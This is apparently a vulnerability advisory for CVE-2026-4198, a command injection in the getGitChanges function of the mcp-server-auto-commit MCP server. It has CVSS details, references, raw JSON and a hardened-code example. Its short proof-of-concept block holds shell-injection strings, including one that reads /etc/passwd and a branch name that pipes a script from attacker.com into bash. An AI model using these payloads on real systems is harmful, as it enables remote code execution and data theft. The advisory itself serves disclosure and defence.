Security Vulnerability Report
CVE-2026-4198 (CVSS 5.3 MEDIUM)

Published: 2026-03-16 14:20:04
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in hypermodel-labs mcp-server-auto-commit 1.0.0. It affects the function getGitChanges in the file index.ts: input that reaches this function (a branch name, commit message or file path that is interpolated into a git command line) is not neutralised, which leads to command injection (CWE-77). The attack can only be executed locally. An exploit has been publicly disclosed and may be used. The fix is commit f7d992c830c5f2ec5749852e66c0195e3ed7fe30; applying it is the recommended action. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector (v3.1, primary): CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CVSS v4.0 (secondary): 1.9 LOW, CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS v2.0 (secondary): 4.3 MEDIUM, AV:L/AC:L/Au:S/C:P/I:P/A:P
Weaknesses: CWE-74, CWE-77

Configurations (Affected Products)

mcp-server-auto-commit <= 1.0.0 (no structured configuration data is available for this CVE)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2026-4198 PoC - Command Injection in mcp-server-auto-commit
// Target: hypermodel-labs/mcp-server-auto-commit v1.0.0
// Attack Vector: Malicious Git branch/commit message injection

// Example 1: Malicious branch name injection
const maliciousBranch = 'test;$(whoami)>pwned.txt;#';
// When processed by getGitChanges(), executes: git branch test;$(whoami)>pwned.txt;#

// Example 2: Backtick command substitution
const maliciousCommit = 'Initial commit`whoami`test';
// Executes: git commit -m "Initial commit`whoami`test"

// Example 3: Pipe chain execution
const maliciousPath = 'file.txt|cat /etc/passwd';
// Executes: git diff file.txt|cat /etc/passwd

// Exploitation scenario:
// 1. Attacker clones a repository
// 2. Creates a branch with malicious name: git checkout -b "test;$(curl http://attacker.com/shell.sh|bash)"
// 3. The mcp-server-auto-commit plugin processes this branch name
// 4. Command injection occurs when getGitChanges() is called

// Recommended verification:
// Check if the following returns unexpected output:
// node -e "const {getGitChanges} = require('./index.ts'); getGitChanges();"
```
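The defensive counterpart to the strings above, as an added example that is not code from mcp-server-auto-commit or its patch (the helper names unsafeGitDiffCommand, isSafeGitRef, gitDiffArgs, gitLogArgs and runGit are assumptions): build git invocations as argv arrays for execFile instead of a shell string, put "--" between options and user data, and allowlist branch names before git sees them.

```javascript
// Added example, not the project's code: the injection class above arises
// when a git command is assembled as one shell string, e.g.
//   exec(`git diff ${path}`)   // /bin/sh parses ';', '|', '$()' and backticks
// The hardened helpers pass an argv array to execFile (no shell), separate
// options from user data with "--", and allowlist ref names before git sees them.

// Vulnerable pattern, kept only as a string builder to show what the shell
// would receive; it is never handed to exec() here.
function unsafeGitDiffCommand(path) {
  return `git diff ${path}`;
}

// Conservative ref-name check, tighter than git's own check-ref-format:
// allowlisted characters only, no leading "-" (option injection), no "..",
// no doubled or leading/trailing "/", no trailing "." or ".lock".
function isSafeGitRef(ref) {
  if (typeof ref !== "string" || ref.length === 0 || ref.length > 255) return false;
  if (!/^[A-Za-z0-9._\/-]+$/.test(ref)) return false;
  if (ref.startsWith("-") || ref.startsWith("/") || ref.endsWith("/")) return false;
  if (ref.includes("..") || ref.includes("//")) return false;
  if (ref.endsWith(".") || ref.endsWith(".lock")) return false;
  return true;
}

// argv for "git diff" over one pathspec. Without a shell, ';', '|', '$()' and
// backticks in `path` are ordinary filename bytes; "--" stops git from reading
// a value such as "--output=x" as an option.
function gitDiffArgs(path) {
  if (typeof path !== "string" || path.length === 0 || path.includes("\0")) {
    throw new TypeError("invalid pathspec");
  }
  return ["diff", "--name-status", "--", path];
}

// argv for "git log" on a branch: the ref is validated and "--" is still added.
function gitLogArgs(branch) {
  if (!isSafeGitRef(branch)) throw new TypeError(`refusing unsafe ref: ${branch}`);
  return ["log", "--oneline", "-n", "20", branch, "--"];
}

// Runs git with an argv array; execFileSync never invokes a shell unless asked.
// child_process is required lazily so the helpers above stay side-effect free.
function runGit(args, cwd = process.cwd()) {
  const { execFileSync } = require("node:child_process");
  return execFileSync("git", args, { cwd, encoding: "utf8" });
}
```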

References

https://github.com/hypermodel-labs/mcp-server-auto-commit/
https://github.com/hypermodel-labs/mcp-server-auto-commit/issues/7
https://github.com/hypermodel-labs/mcp-server-auto-commit/pull/8/changes/f7d992c830c5f2ec5749852e66c0195e3ed7fe30
https://github.com/user-attachments/files/25687034/mcp-server-auto-commit_security_advisory.pdf
https://vuldb.com/?ctiid.351110
https://vuldb.com/?id.351110
https://vuldb.com/?submit.770421

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4198",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T14:20:04.360",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was determined in hypermodel-labs mcp-server-auto-commit 1.0.0. Affected by this vulnerability is the function getGitChanges of the file index.ts. This manipulation causes command injection. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. Patch name: f7d992c830c5f2ec5749852e66c0195e3ed7fe30. Applying a patch is the recommended action to fix this issue. The project was informed of the problem early through an issue report but has not responded yet."
      },
      {
        "lang": "es",
        "value": "Se determinó una vulnerabilidad en hypermodel-labs mcp-server-auto-commit 1.0.0. Afectada por esta vulnerabilidad es la función getGitChanges del archivo index.ts. Esta manipulación causa inyección de comandos. El ataque solo puede ser ejecutado localmente. El exploit ha sido divulgado públicamente y puede ser utilizado. Nombre del parche: f7d992c830c5f2ec5749852e66c0195e3ed7fe30. Aplicar un parche es la acción recomendada para solucionar este problema. El proyecto fue informado del problema tempranamente a través de un informe de problemas pero aún no ha respondido."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 1.9,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P",
            "baseScore": 4.3,
            "accessVector": "LOCAL",
            "accessComplexity": "LOW",
            "authentication": "SINGLE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL"
          },
          "baseSeverity": "MEDIUM",
          "exploitabilityScore": 3.1,
          "impactScore": 6.4,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-74"},
          {"lang": "en", "value": "CWE-77"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/hypermodel-labs/mcp-server-auto-commit/", "source": "[email protected]"},
      {"url": "https://github.com/hypermodel-labs/mcp-server-auto-commit/issues/7", "source": "[email protected]"},
      {"url": "https://github.com/hypermodel-labs/mcp-server-auto-commit/pull/8/changes/f7d992c830c5f2ec5749852e66c0195e3ed7fe30", "source": "[email protected]"},
      {"url": "https://github.com/user-attachments/files/25687034/mcp-server-auto-commit_security_advisory.pdf", "source": "[email protected]"},
      {"url": "https://vuldb.com/?ctiid.351110", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.351110", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.770421", "source": "[email protected]"}
    ]
  }
}
```